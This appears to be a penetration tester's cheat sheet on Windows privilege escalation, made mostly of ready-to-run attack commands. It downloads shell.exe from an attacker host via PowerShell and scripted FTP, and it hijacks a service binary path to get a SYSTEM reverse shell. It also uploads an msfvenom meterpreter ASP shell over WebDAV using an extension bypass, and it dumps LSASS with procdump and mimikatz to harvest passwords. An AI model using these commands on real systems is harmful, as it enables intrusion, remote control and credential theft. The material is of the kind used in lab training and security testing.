Windows Privilege Escalation

source

Uploading Files on Windows Machine from Kali Linux

Using PowerShell

To start HTTP server:

python -m SimpleHTTPServer

To download file shell.exe from command line:

powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/shell.exe','C:\Users\test\Desktop\shell.exe')"

Using FTP

To install FTP module for python:

apt-get install python-pyftpdlib  

To start ftp server:

python -m pyftpdlib -p 21

To download file shell.exe from FTP server in one command:

echo open 192.168.1.1>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo get shell.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt

AccessCheck

Download AccessCheck

(( STAGE++ )); echo -e "\n\n ${GREEN}[+]${RESET} (${STAGE}/${TOTAL}) Downloading ${GREEN}AccessChk.exe${RESET} ~ Windows environment tester"
apt -y -qq install curl windows-binaries unzip \
  || echo -e ' '${RED}'[!] Issue with apt install'${RESET} 1>&2
echo -n '[1/2]'; timeout 300 curl --progress -k -L -f "https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe" > /usr/share/windows-binaries/accesschk_v5.02.exe \
  || echo -e ' '${RED}'[!]'${RESET}" Issue downloading accesschk_v5.02.exe" 1>&2   #***!!! hardcoded path!
echo -n '[2/2]'; timeout 300 curl --progress -k -L -f "https://download.sysinternals.com/files/AccessChk.zip" > /usr/share/windows-binaries/AccessChk.zip \
  || echo -e ' '${RED}'[!]'${RESET}" Issue downloading AccessChk.zip" 1>&2
unzip -q -o -d /usr/share/windows-binaries/ /usr/share/windows-binaries/AccessChk.zip
rm -f /usr/share/windows-binaries/{AccessChk.zip,Eula.txt}

source

On Windows XP you should use AccessCheck 5.2 version.

When uploading AccessCheck on FTP server it is very important to use binary mode by simply typing binary right after connection.

AccessCheck usage examples

accesschk_v5.02.exe /accepteula -uwcqv "Authenticated Users" *

-u - suppress errors -w - show only objects that have write access -c - same is a Windows Service, e.g. ssdpsrv. Specify “*” as the name to show all services and “scmanager” to check the security of the Service Control Manager. -q - omit banner -v - verbose

Example output:

accesscheckoutput

source

Service controller

sc qc SSDPSRV

Example output

scqc

To escalate privileges we can change binary path name, user and then start this server with system privileges:

sc config SSDPSRV binpath= "C:\shell.exe"
sc config SSDPSRV obj= ".\LocalSystem" password= ""
sc config SSDPSRV start= demand
net start SSDPSRV

And hopefully on our server we’ll have a reverse shell with system privileges:

shell

To show all network connections

netstat -ano

netstat

As unprivileged user can see only PID’s and not process full names (as on screenshot above), to show the process name:

tasklist | findstr /c:"1768"

Whitespaces in directory traversal on Windows machine T_T

When trying to perform an directory traversal attack on Femitter FTP I was not able to list the directory content because of white spaces.

dirtraversal

The solution is to use MS Windows directory short notation C:\Docume~1\ for C:\Documents and Settings:

dirtraversal2

I love Windows syntax! Joking

Exploiting WEBDAV with metasploit and cadaver

To discover if WebDav is enabled you can use auxiliary/scanner/http/webdav_scanner module:

webdavscan

To see what options are allowed you can use use auxiliary/scanner/http/options If PUT method is allowed you probably can upload web .asp shell. In my case .asp file upload was forbidden and only .txt and .html were allowed. In such situation we should upload file.txt and then to copy it as file.asp;.txt

To upload files we will use cadaver tool which is already installed in Kali 2.0. We will upload pregenerated shell.asp meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 -f asp > shell.asp
cadaver http://10.1.1.1/
put shell.asp shell.txt
copy shell.txt shell.asp;.txt

And now we successfully uploaded shell:

upload

And executed it: exec

Hooray ^_^

Dumping LSASS and getting creds

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Procdump can be downloaded here

On your machine run mimikatz. Mimikatz can be downloaded here

mimikatz.exe

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords

Enumerate Domain Controllers

nltest /dclist:domainname